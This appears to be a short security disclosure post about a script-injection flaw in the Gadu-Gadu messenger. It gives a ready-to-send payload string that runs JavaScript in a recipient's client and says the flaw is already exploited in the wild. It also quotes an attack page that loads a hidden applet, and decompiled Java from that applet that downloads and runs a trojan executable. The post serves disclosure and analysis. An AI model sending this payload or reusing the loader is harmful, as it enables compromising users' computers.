Send such a string to any receipent: www.po"style=background-image:url(javascript:document.write('%3cscript%3ealert%28%22you%20are%20owned!%22%29%3c%2fscript%3e'));".pl
Beware, this bug is being already exploited in the wild. I have just received the following message from WWW to GG gateway (gg# 7021349):
The adv407.php file contains the following HTML code:
[html][head] [/head][body] [textarea id="cxw" style="display:none;"] [object data="${PR}" type="text/x-scriptlet"][/object] [/textarea]
[script language="javascript"]
[applet width=1 height=1 ARCHIVE=loaderadv407.jar code=Counter][/APPLET][/body][/html]
After downloading and decompiling loaderadv407.jar I noticed, that it does:
URL url1 = new URL(""); URLConnection urlconnection = url1.openConnection(); [...] FileOutputStream fileoutputstream = new FileOutputStream(s4 + "\\loadnew.exe"); [...] as[0] = s4 + "\\loadnew.exe"; Process process = Runtime.getRuntime().exec(as);
Clamav recognizes this binary as Trojan.Qhost.O.
-- * Fido: 2:480/124 ** WWW: ** NICHDL: PMF9-RIPE * * JID: venglin@xxxxxxxxxxxxxxx ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *